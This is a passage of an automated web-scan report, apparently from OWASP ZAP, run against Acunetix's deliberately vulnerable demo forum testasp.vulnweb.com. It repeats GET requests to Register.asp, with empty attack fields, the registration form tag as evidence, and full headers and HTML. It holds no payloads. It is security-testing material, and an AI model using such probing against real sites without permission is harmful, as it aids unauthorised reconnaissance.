<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
